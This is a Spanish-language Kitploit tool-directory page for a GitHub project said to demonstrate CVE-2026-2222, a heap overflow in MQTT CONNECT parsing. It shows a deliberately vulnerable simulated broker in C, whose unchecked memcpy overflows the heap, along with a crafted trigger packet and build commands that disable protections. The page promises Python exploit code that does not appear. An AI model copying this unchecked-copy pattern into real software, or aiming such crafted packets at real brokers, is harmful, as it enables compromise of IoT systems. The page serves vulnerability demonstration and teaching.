Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-2222-MQTT-Broker-CONNECT-Packet-Heap-Overflow — Demuestra el desbordamiento de montón CVE-2026-2222 en el manejo de paquetes MQTT CONNECT con un broker vulnerable simulado y código de exploit de prueba de concepto para ejecución remota de código. | Kitploit
Herramientas/GitHubGitHub/george0papasotiriou/cve-2026-2222-mqtt-broker-connect-packet-heap-overflow
Seguridad IoTAnálisis de VulnerabilidadesExplotaciónAprendizaje y EducaciónExplotación de Binarios
GitHubgeorge0papasotiriou/cve-2026-2222-mqtt-broker-connect-packet-heap-overflow

CVE-2026-2222-MQTT-Broker-CONNECT-Packet-Heap-Overflow

Demuestra el desbordamiento de montón CVE-2026-2222 en el manejo de paquetes MQTT CONNECT con un broker vulnerable simulado y código de exploit de prueba de concepto para ejecución remota de código.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 17 díasAún no revisado

CVE-2026-2222 – Desbordamiento de montón en el paquete CONNECT de broker MQTT

Código del programa (C + Python)

root@kitploit:~
// mqtt_broker_sim.c - Simulated vulnerable MQTT broker
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

struct mqtt_connect {
    char protocol_name[8];
    uint8_t protocol_level;
    uint8_t flags;
    uint16_t keepalive;
    // remaining length field misinterpreted
};

void process_connect(uint8_t *packet, size_t len) {
    // Assume we've parsed fixed header: remaining length = (packet[1] & 0x7F) + ...
    // For demo, we read a 2-byte "remaining length" from packet[1:3] and allocate that many bytes,
    // then copy payload without proper bounds.
    uint16_t remaining_length = (packet[1] << 8) | packet[2]; // should be encoded as variable length, but we misuse
    printf("Allocating %d bytes\n", remaining_length);
    char *buffer = malloc(remaining_length); // if remaining_length is crafted to wrap, small allocation
    // copy payload from packet+3 for remaining_length bytes -> heap overflow if remaining_length > len-3
    memcpy(buffer, packet+3, remaining_length); // overflow
    // process...
    free(buffer);
}

int main() {
    // Crafted malicious packet: remaining_length = 0xFFFF (65535) but actual packet size small
    uint8_t evil[] = {0x10, 0xFF, 0xFF, 0x00, 0x04, 'M','Q','T','T'}; // length 9
    process_connect(evil, sizeof(evil));
    return 0;
}

CVE-2026-2222 – Desbordamiento de montón en CONNECT de broker MQTT

Severity: Critical

Descripción general

Un desbordamiento de entero en el análisis del campo de longitud restante del paquete CONNECT de MQTT provoca un desbordamiento de búfer en el montón, lo que permite la ejecución remota de código en el broker.

Detalles de la vulnerabilidad

  • Tipo: Desbordamiento de enteros / Desbordamiento de búfer en montón
  • Impacto: Ejecución remota de código en el broker MQTT, comprometiendo todos los dispositivos IoT conectados.
  • Causa raíz: El broker decodifica la longitud restante como un valor de 16 bits y lo usa directamente en una asignación de memoria y en una copia sin verificar que coincida con el tamaño real del paquete.

Demostración del exploit

Compila y ejecuta el broker vulnerable simulado:

root@kitploit:~
gcc mqtt_broker_sim.c -o mqtt_broker_sim -fno-stack-protector -z execstack
./mqtt_broker_sim
Descargar herramienta